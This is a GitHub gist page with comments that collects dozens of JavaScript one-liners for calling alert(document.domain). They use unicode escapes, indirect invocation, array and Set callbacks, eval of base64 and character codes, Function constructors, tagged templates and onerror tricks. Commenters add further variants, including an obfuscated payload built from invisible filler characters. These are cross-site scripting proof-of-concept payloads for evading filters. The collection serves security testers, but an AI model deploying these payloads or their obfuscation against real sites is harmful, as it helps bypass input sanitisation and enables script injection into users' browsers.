-
-
Save tomnomnom/14a918f707ef0685fdebd90545580309 to your computer and use it in GitHub Desktop.
// How many ways can you alert(document.domain)? | |
// Comment with more ways and I'll add them :) | |
// I already know about the JSFuck way, but it's too long to add (: | |
// Direct invocation | |
alert(document.domain); | |
(alert)(document.domain); | |
al\u0065rt(document.domain); | |
al\u{65}rt(document.domain); | |
window['alert'](document.domain); | |
top['alert'](document.domain); | |
top[8680439..toString(30)](document.domain); | |
top[/alert/.source](document.domain); | |
alert(this['document']['domain']); | |
// Indirect Invocation | |
alert.call(null, document.domain); | |
alert.apply(null, [document.domain]); | |
alert.bind()(document.domain); | |
Reflect.apply(alert, null, [document.domain]); | |
alert.valueOf()(document.domain); | |
with(document) alert(domain); | |
Promise.all([document.domain]).then(alert); | |
document.domain.replace(/.*/, alert); | |
// Array methods | |
[document.domain].find(alert); | |
[document.domain].findIndex(alert); | |
[document.domain].filter(alert); | |
[document.domain].every(alert); | |
[document.domain].forEach(alert); | |
// Alternate array syntax (all array methods apply) | |
Array(document.domain).find(alert); | |
Array.of(document.domain).find(alert); | |
(new Array(document.domain)).find(alert); | |
// Other Datastructure Methods | |
(new Map()).set(1, document.domain).forEach(alert); | |
(new Set([document.domain])).forEach(alert); | |
// Evaluated | |
eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=')); | |
eval(atob(/YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=/.source)); | |
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59)); | |
setTimeout`alert\u0028document.domain\u0029`; | |
Set.constructor`alert\x28document.domain\x29```; | |
(new Function('alert(document.domain)'))(); | |
(new (Object.getPrototypeOf(async function(){}).constructor)('alert(document.domain)'))(); | |
Function('x','alert(x)')(document.domain); | |
// Template Literal Expression | |
`${alert(document.domain)}`; | |
// onerror assignment | |
onerror=alert;throw document.domain; | |
onerror=eval;throw'=alert\x28document.domain\x29'; | |
// With location.hash = #alert(document.domain) | |
eval(location.hash.substr(1)) |
also, of the back of the "Array processors" idea, you've also got promises and chains:
Promise.all([document.domain]).then(alert)
and a reminder that document
and alert
are both parents of window
:
alert(this['document']['domain']);
(though I don't know if that's useful information)
[a-z()]
: with(document)alert(domain)
Thanks for the suggestions, @cmbuckley, @E314c, @avlidienbrunn :)
Try this one:
([,ᅠ,,,,ᅠᅠ]=[]+{},[ᅠᅠᅠ,ᅠ,ᅠᅠᅠᅠ,ᅠᅠ,,ᅠᅠᅠᅠᅠ,ᅠᅠᅠ,ᅠᅠᅠᅠᅠᅠ,,,ᅠᅠᅠᅠ]=[!!ᅠ]+!ᅠ+ᅠ.ᅠ) [ᅠᅠ+=ᅠ+ᅠᅠᅠᅠ+ᅠᅠᅠᅠᅠᅠ+ᅠᅠᅠ+ᅠ+ᅠᅠᅠᅠ+ᅠᅠ+ᅠᅠᅠ+ᅠ+ᅠ][ᅠᅠ] (ᅠᅠᅠᅠᅠ+ᅠᅠᅠ+ᅠᅠ+ᅠ+ᅠᅠᅠ+'(document.domain)')``
((((alert))))(domain)
Yep, you can do just domain instead of document.domain
@mikaelv2 Is there a good place to explain how yours works? I get that it's getting strings of internals like false
, true
undefined
, but I'm lost as to how it accomplishes it and I'd like to know how to make my own arbitrary calls.
alert(eval('\144\157\143\165\155\145\156\164\056\144\157\155\141\151\156'))
[origin].map(alert)
not alert but what about
{prompt`${document.domain}`}
Another arguably slightly different one:
Function('x','alert(x)')(document.domain)